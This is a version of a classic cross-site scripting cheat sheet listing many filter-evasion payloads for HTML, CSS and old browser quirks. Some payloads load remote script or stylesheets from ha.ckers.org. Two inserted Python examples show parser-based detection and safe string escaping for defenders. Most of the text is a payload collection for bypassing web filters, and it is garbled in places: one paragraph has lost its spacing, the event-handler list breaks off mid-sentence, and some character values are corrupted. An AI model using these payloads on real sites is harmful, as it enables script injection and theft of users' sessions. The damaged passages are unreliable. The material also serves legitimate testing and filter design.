
XSS locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use the URL encoding calculator below to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XSS locator 2. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable:

'';!--"<XSS>=&{()}

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well - I'll probably revise this at a later date):

<IMG SRC="javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

No quotes and no semicolon:

<IMG SRC=javascript:alert('XSS')>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Case insensitive XSS attack vector:

<IMG SRC=JaVaScRiPt:alert('XSS')>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

HTML entities (the semicolons are required for this to work):

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents):

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Malformed IMG tags. Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

fromCharCode (if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need). Click here to build your own (thanks to Hannes Leopold):

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS calculator for more information:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). Use the XSS calculator for more information:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded tab to break up the cross site scripting attack (the character between "jav" and "ascript" is a literal tab):

<IMG SRC="jav	ascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded encoded tab to break up XSS:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector) these are not spaces just one of the three characters as described above:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Null breaks up JavaScript directive. Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Null breaks up cross site scripting vector. Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date:

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render - and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal):

<IMG SRC=" &#14;  javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

NonalphanondigitXSS.WhileIw asreadingtheFirefoxHTMLparserIfoundthatitassumesa nonalphanondigitisnotvalidafteranHTMLkeyw ordandthereforconsidersittobea w hitespaceornonvalidtokenafteranHTMLtag.TheproblemisthatsomeXSSfiltersassume thatthetagtheyarelookingforisbrokenupbyw hitespace.Forexample"<SCRIPT\s"!= "<SCRIPT/XSS\s": <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

Non-alpha-non-digit part 2 XSS. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Non-alpha-non-digit part 3 XSS. Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

<<SCRIPT>alert("XSS");//<</SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
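The encoding entries above (padded and hex character references without semicolons, embedded tab/newline/carriage return, leading control characters) and the non-alpha-non-digit and extraneous-bracket entries make one defensive point: a filter that searches the raw input for "javascript:" or "<SCRIPT " is matching the wrong representation. The following added example, which is not code from the cheat sheet, shows the alternative a defender should use: tokenize with a real HTML parser and canonicalize attribute values before inspecting them. All function and class names (canonical_url, scripting_scheme, Inspector, inspect, naive_regex_match) are my own; the test inputs are vectors quoted from the sheet.

```python
"""Parser-based inspection of HTML fragments (added example, not from the
cheat sheet). Python's html.parser lowercases tag and attribute names and
decodes character references in attribute values, including references
without a trailing semicolon, zero-padded decimal and hex forms, which is
exactly what the regex-style filters on the sheet get wrong."""
import html
import re
from html.parser import HTMLParser

# Attributes whose value the browser treats as a URL to load or navigate to.
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "data", "action"}
# Tags that execute or load active content on their own.
ACTIVE_TAGS = {"script", "object", "embed", "layer", "bgsound", "xml"}


def canonical_url(value):
    """Decode HTML character references, then strip every character the
    browser ignores inside a URL scheme (ASCII 0x00-0x20: nulls, tabs,
    newlines, carriage returns, spaces and the other control characters).
    The result is lowercased so scheme comparison is case-insensitive."""
    decoded = html.unescape(value or "")
    return re.sub(r"[\x00-\x20]", "", decoded).lower()


def scripting_scheme(url):
    """Return the scheme name if a canonical URL would run script, else None.
    data: is only flagged for HTML and SVG payloads; data:image/png is benign."""
    if url.startswith(("javascript:", "vbscript:", "mocha:", "livescript:")):
        return url.split(":", 1)[0]
    if url.startswith(("data:text/html", "data:image/svg+xml")):
        return "data"
    return None


class Inspector(HTMLParser):
    """Collects (kind, detail) findings for every start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # tag and attribute names arrive lowercased; values arrive unescaped.
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-tag", tag))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", name))
            elif name in URL_ATTRS:
                scheme = scripting_scheme(canonical_url(value))
                if scheme:
                    self.findings.append(("script-scheme", scheme))


def inspect(fragment):
    """Parse an HTML fragment and return the list of findings."""
    parser = Inspector()
    parser.feed(fragment)
    parser.close()
    return parser.findings


def naive_regex_match(fragment):
    """The brittle check the sheet's vectors are built to slip past: a
    case-insensitive search for '<script ' or 'javascript:' in the raw text."""
    return re.search(r"<script\s|javascript:", fragment, re.I) is not None


if __name__ == "__main__":
    # Constructed sample: one sheet vector that the raw-string check misses.
    sample = '<IMG SRC="jav&#x0A;ascript:alert(\'XSS\');">'
    print("naive regex:", naive_regex_match(sample))
    print("parser     :", inspect(sample))
```

The inspector only reports; a sanitizer built on it would drop the offending tag or attribute. The important design choice is that every comparison happens on the decoded, control-stripped value, so the "jav&#x0A;ascript", "&#0000106", "&#x6A" and leading "&#14;" variants all collapse to the same string.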

No closing script tags. In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

<SCRIPT SRC=//ha.ckers.org/.j>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Half open HTML/JavaScript XSS vector. Unlike Firefox the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

<IMG SRC="javascript:alert('XSS')"

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Double open angle brackets. This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<iframe src=http://ha.ckers.org/scriptlet.html <

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

XSS with no single quotes or double quotes or semicolons:

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:

\";alert('XSS');//

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
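The entry above describes a server that escapes only the double quote. The added example below, which is not code from the cheat sheet, reproduces that flawed escaping beside the correct one (encode the value as a JSON string literal and additionally escape "<", ">" and "/") and includes a small scanner for a JavaScript double-quoted string literal, so you can see exactly where each version of the literal ends and what the browser would execute after it. Names (naive_quote_escape, safe_js_string, js_string_literal_end, code_after_literal) are my own.

```python
"""Embedding untrusted text in a <SCRIPT> string literal (added example,
not from the cheat sheet)."""
import json


def naive_quote_escape(user_input):
    """The flawed server-side escaping the sheet describes: the double
    quote becomes \\" but a backslash supplied by the user is left alone,
    so a user backslash neutralizes the escape the server adds."""
    return user_input.replace('"', '\\"')


def safe_js_string(user_input):
    """Encode as a JSON string literal (escapes backslash, quotes and
    control characters) and then hex-escape the characters that matter
    inside a <script> block so '</script>' can never appear in the output."""
    literal = json.dumps(user_input)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("/", "\\/"))


def js_string_literal_end(src, start):
    """src[start] must be '"'. Return the index just past the closing quote
    of that literal, or None if it never terminates. A backslash always
    consumes the following character, whatever it is."""
    i = start + 1
    while i < len(src):
        if src[i] == "\\":
            i += 2
            continue
        if src[i] == '"':
            return i + 1
        i += 1
    return None


def code_after_literal(script_body):
    """Return whatever follows the first string literal in a statement of
    the form var a="...";  For a correctly escaped value this is just ';'."""
    start = script_body.index('"')
    end = js_string_literal_end(script_body, start)
    return script_body[end:]


if __name__ == "__main__":
    # Constructed input: the sheet's own escape-the-escape vector.
    payload = "\\\";alert('XSS');//"
    print("naive :", code_after_literal('var a="' + naive_quote_escape(payload) + '";'))
    print("safe  :", code_after_literal('var a=' + safe_js_string(payload) + ';'))
```

With the naive escaper the literal closes after the user's backslash and the rest of the line is live code; with the JSON encoder the literal runs to the end and the trailing code is just the statement terminator.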

End title tag. This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

INPUT image:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BODY image:

<BODY BACKGROUND="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):

<BODY ONLOAD=alert('XSS')>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG Dynsrc:

<IMG DYNSRC="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG lowsrc:

<IMG LOWSRC="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Event Handlers that can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Please note I have excluded browser support from this section because each one may have different results in different browsers. Thanks to Rene Ledosquet for the HTML+TIME updates:

1. FSCommand() (attacker can use this when executed from within an embedded Flash object)
2. onAbort() (when user aborts the loading of an image)
3. onActivate() (when object is set as the active element)
4. onAfterPrint() (activates after user prints or previews print job)
5. onAfterUpdate() (activates on data object after updating data in the source object)
6. onBeforeActivate() (fires before the object is set as the active element)
7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
8. onBeforeCut() (attacker executes the attack string right before a selection is cut)
9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the

BGSOUND:

<BGSOUND SRC="javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

& JavaScript includes (works in Netscape 4.x):

<BR SIZE="&{alert('XSS')}">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

LAYER (also only works in Netscape 4.x):

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

STYLE sheet:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet part 3. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Local htc file. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

<XSS STYLE="behavior: url(xss.htc);">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

List-style-image. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

VBscript in an image:

<IMG SRC='vbscript:msgbox("XSS")'>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Mocha (older versions of Netscape only):

<IMG SRC="mocha:[code]">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

Livescript (older versions of Netscape only):

<IMG SRC="livescript:[code]">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page:

¼script¾alert(¢XSS¢)¼/script¾

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

META (the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs):

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

META using data: directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

META with additional URL parameter. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IFRAME (if iframes are allowed there are a lot of other XSS problems as well):

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

FRAME (frames have the same sorts of XSS problems as iframes):

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

TABLE (who would have thought tables were XSS targets... except me, of course):

<TABLE BACKGROUND="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

TD (just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV background-image:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

DIV expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":

<DIV STYLE="width: expression(alert('XSS'));">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts):

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov for this one):

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter):

<XSS STYLE="xss:expression(alert('XSS'))">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop):

exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE tag (Older versions of Netscape only):

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]

STYLE tag using background-image:

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

STYLE tag using background:

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):

<BASE HREF="javascript:alert('XSS');//">

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

OBJECT tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Using an OBJECT tag you can embed XSS directly (this is unverified so no browser support is added):

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

